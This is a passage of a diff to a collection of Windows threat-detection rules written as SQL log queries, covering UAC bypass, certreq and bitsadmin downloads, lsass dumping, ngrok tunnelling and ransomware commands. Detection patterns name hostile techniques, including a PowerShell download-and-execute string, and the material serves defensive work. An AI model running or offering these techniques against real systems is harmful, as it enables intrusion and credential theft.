"proc_creation_win_hktl_sharpevtmute.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "status": "experimental", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "status": "experimental", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", - "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "status": "test", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", + "tags": [ + "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", - "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "status": "experimental", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "Software installers that pull packages from remote systems and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1059.001", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1027.005" + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", - "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "title": "Process Access via TrolleyExpress Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "status": "experimental", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.credential_access", "attack.defense_evasion", - "attack.t1036" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Very likely, needs more tuning" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects .NET CLR DLLs being loaded by 